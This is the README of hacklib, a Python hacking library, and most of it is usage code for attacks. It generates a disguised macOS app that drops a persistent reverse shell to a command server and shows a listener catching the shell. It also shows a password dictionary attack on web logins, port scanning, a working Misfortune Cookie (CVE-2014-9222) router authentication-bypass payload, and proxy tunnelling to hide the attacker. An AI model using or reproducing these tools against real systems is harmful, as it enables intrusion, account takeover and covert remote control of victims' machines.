hacklib is a Python module for hacking enthusiasts interested in network security. It is no longer in active development.
To get hacklib, simply run in command line:
pip install hacklibhacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:
python hacklib.py----------------------------------------------Hey. What can I do you for?Enter the number corresponding to your choice.1) Connect to a proxy2) Target an IP or URL3) Lan Scan4) Create Backdoor5) Server6) ExitOr if you got it using pip:
importhacklibhacklib.userInterface()Reverse shell backdooring (Currently only for Macs):
importhacklibbd=hacklib.Backdoor() # Generates an app that, when ran, drops a persistent reverse shell into the system.bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures') # Takes the IP and port of the command server, the OS of the target, and the name of the .appGenerated App:
Listen for connections with Server:
>>>importhacklib>>>s=hacklib.Server(9090) # Bind server to port 9090>>>s.listen() Newconnection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)bash: nojobcontrolinthisshellbash$ whoami# Type a commandleonbash$ # Nice!Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:
importhacklibac=hacklib.AuthClient() # Logging into a gmail accounthtmldata=ac.login('https://gmail.com', 'email', 'password') # Check for a string in the resulting pageif'Inbox'inhtmldata: print'Login Success.'else: print'Login Failed.'# For logins using HTTP Basic Auth:try: htmldata=ac.login('http://somewebsite.com', 'admin', 'password') except: pass#login failedSimple dictionary attack using AuthClient:
importhacklibac=hacklib.AuthClient() # Get the top 100 most common passwordspasswords=hacklib.topPasswords(100) forpinpasswords: htmldata=ac.login('http://yourwebsite.com/login', 'admin', p) ifhtmldataand'welcome'inhtmldata.lower(): print'Password is', pbreakPort Scanning:
fromhacklibimport*ps=PortScanner() ps.scan(getIP('yourwebsite.com')) # By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default# After a scan, open ports are saved within ps for referenceifps.portOpen(80): # Establish a TCP stream and sends a messagesend(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\r\n\r\n')Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
>>>importhacklib# Discovery>>>ps=hacklib.PortScanner() >>>ps.scan('192.168.1.1', (80, 81)) Port80: HTTP/1.1200Content-Type: text/htmlTransfer-Encoding: chunkedServer: RomPager/4.07UPnP/1.0EXT: # The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.# Exploitation>>>payload='''GET / HTTP/1.0\r\nHost: 192.168.1.1User-Agent: googlebotAccept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8Accept-Language: en-US, en; q=0.5Accept-Encoding: gzip, deflateCookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00'''+'\r\n\r\n'>>>hacklib.send('192.168.1.1', 80, payload) # The cookie replaced the firmware's memory allocation for web authentication with a null bye.# The router's admin page is now fully accessible from any web browser.FTP authentication:
importhacklibftp=hacklib.FTPAuth('127.0.0.1', 21) try: ftp.login('username', 'password') except: print'Login failed.'Socks4/5 proxy scraping and tunneling
>>>importhacklib>>>importurllib2>>>proxylist=hacklib.getProxies() # scrape recently added socks proxies from the internet>>>proxy=hacklib.Proxy() >>>proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist>>>proxy.IPu'41.203.214.58'>>>proxy.port65000>>>proxy.countryu'KE'# All Python network activity across all modules are routed through the proxy:>>>urllib2.urlopen('http://icanhazip.com/').read() '41.203.214.58\n'# Notes: Only network activity via Python are masked by the proxy.# Network activity on other programs such as your webbrowser remain unmasked.# To filter proxies by country and type:# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')Word Mangling:
fromhacklibimport*word=Mangle("Test", 0, 10, 1990, 2016) word.Leet() word.Numbers() word.Years()Output:
T3$t Test0 0Test ...snip... Test10 10Test Test1990 1990Test ...snip... Test2016 2016Test Pattern Create:
fromhacklibimport*Pattern=PatternCreate(100) Pattern.generate()Output:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A Pattern Offset:
fromhacklibimport*Offset=PatternOffset("6Ab7") Offset.find()Output:
[+] Offset: 50Not all classes have external dependencies, but just in case you can do the following:
hacklib.installDependencies()